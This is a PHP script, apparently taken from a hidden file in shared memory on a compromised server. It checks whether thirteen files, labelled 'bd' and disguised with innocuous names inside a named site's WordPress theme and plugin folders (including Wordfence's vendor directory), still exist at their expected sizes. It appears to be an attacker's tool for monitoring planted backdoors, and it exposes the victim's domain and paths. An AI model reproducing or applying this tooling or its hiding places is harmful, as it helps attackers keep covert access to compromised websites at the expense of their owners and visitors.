File: //proc/thread-self/root/dev/shm/.k
<?php $r = '/home/sdmepqvf/ymca-cairo.com'; $x = ["/wp-content/themes/woodmart/inc/admin/modules/options/controls/reset/class.reset.php"=>"bd@@102409@@876",
"/wp-content/themes/woodmart/inc/modules/floating-blocks/admin/predefined/floating-block/bar/layout-4/invoice.php"=>"bd@@56593@@956",
"/wp-content/themes/woodmart/inc/integrations/gutenberg/src/layouts/sp-size-guide-btn/latest_item.php"=>"bd@@88097@@843",
"/wp-content/themes/woodmart/inc/integrations/gutenberg/src/layouts/post-meta-value/test4.php"=>"bd@@88892@@869",
"/wp-content/themes/woodmart/inc/integrations/gutenberg/src/components/controls/advanced/ssi.php"=>"bd@@84819@@962",
"/wp-content/themes/woodmart/inc/integrations/gutenberg/src/blocks/product-filters/product-filters/raw.php"=>"bd@@115052@@964",
"/wp-content/themes/woodmart/inc/integrations/gutenberg/src/layouts/sp-wishlist-btn/emailEN.php"=>"bd@@89460@@1032",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/includes.php"=>"bd@@115061@@918",
"/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/eventlist.php"=>"bd@@115071@@986",
"/wp-content/plugins/revslider/admin/includes/shortcode_generator/gutenberg/src/assets/images/hungarian.php"=>"bd@@115079@@1137",
"/wp-content/themes/woodmart/inc/integrations/gutenberg/src/blocks/products-tabs/products-tabs-products/picshow.php"=>"bd@@242838@@873",
"/wp-content/themes/woodmart/inc/integrations/gutenberg/src/blocks/product-filters/product-filters-prices/editpage_actions.php"=>"bd@@242839@@1148",
"/wp-content/themes/woodmart/inc/modules/floating-blocks/admin/predefined/floating-block/bar/layout-4/proj_cord.php"=>"bd@@56223@@873"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');